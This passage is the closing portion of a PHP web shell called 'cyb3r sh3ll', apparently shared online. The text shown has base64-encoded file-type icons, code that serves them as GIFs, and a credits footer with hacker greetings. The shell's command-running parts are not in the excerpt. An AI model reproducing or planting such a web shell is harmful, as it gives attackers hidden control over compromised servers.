  4998. "1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
  4999. "ADs=",
  5000. "ext_log"=>
  5001. "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
  5002. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
  5003. "zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
  5004. "ext_php"=>
  5005. "R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg".
  5006. "t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==",
  5007. "ext_pl"=>
  5008. "R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
  5009. "GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
  5010. "ext_swf"=>
  5011. "R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
  5012. "nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
  5013. "ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
  5014. "GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
  5015. "NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
  5016. "ext_tar"=>
  5017. "R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
  5018. "Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
  5019. "HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
  5020. "UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
  5021. "uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  5022. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  5023. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  5024. "AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
  5025. "GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
  5026. "HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
  5027. "u4tLAgEAOw==",
  5028. "ext_txt"=>
  5029. "R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
  5030. "SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
  5031. "UpPWG3Ig6Hq/XmRjuZwkAAA7",
  5032. "ext_wri"=>
  5033. "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
  5034. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
  5035. "a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
  5036. "ext_xml"=>
  5037. "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
  5038. "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  5039. "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
  5040. "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
  5041. "IQA7"
  5042. );
  5043. //For simple size- and speed-optimization.
  5044. $imgequals = array(
  5045. "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
  5046. "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
  5047. "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
  5048. "ext_html"=>array("ext_html","ext_htm"),
  5049. "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
  5050. "ext_lnk"=>array("ext_lnk","ext_url"),
  5051. "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
  5052. "ext_doc"=>array("ext_doc","ext_dot"),
  5053. "ext_js"=>array("ext_js","ext_vbs"),
  5054. "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
  5055. "ext_wri"=>array("ext_wri","ext_rtf"),
  5056. "ext_swf"=>array("ext_swf","ext_fla"),
  5057. "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
  5058. "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
  5059. );
  5060. if (!$getall)
  5061. {
  5062. header("Content-type: image/gif");
  5063. header("Cache-control: public");
  5064. header("Cache-control: max-age=".(60*60*24*7));
  5065. header("Last-Modified: ".date("r",filemtime(__FILE__)));
  5066. foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
  5067. if (empty($images[$img])) {$img = "small_unk";}
  5068. if (in_array($img,$ext_tar)) {$img = "ext_tar";}
  5069. echo base64_decode($images[$img]);
  5070. }
  5071. else
  5072. {
  5073. foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
  5074. natsort($images);
  5075. $k = array_keys($images);
  5076. echo "<center>";
  5077. foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
  5078. echo "</center>";
  5079. }
  5080. exit;
  5081. }
  5082. ?>
  5083. </td></tr></table><a bookmark="minipanel" /><br/>
  5084. <?php
  5085. }
  5086. ?>
  5087. <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor='#C0C0C0'><tr><td height="1" valign="top"><table align="center"><tr><td height="0" valign="top"><center><font face="times, serif" size="3"><b>(C) <font color="orange">Copyright</font><font color="white"> cyb3r </font><font color="green">9l4d!470r</font> [All rights reserved]</b></center></td></tr><tr><td height="0" valign="top"><center><b>Greetz to :</b> r45c4l bro, r8l35n4k, Cyb3R_s3CuR3 and all my friends who helped me a lot.</center></td></tr><tr><td height="0" valign="top"><center><b>--[ cyb3r sh3ll v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u>Coded by</u></a> cyb3r 9l4d!470r (cyber gladiator) | <a href="#"><font color="#FF0000">h4cK2b0yZz..</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></font></center></td></tr></table></td></tr></table>
  5088. </center>
  5089. </body></html>

comments powered by Disqus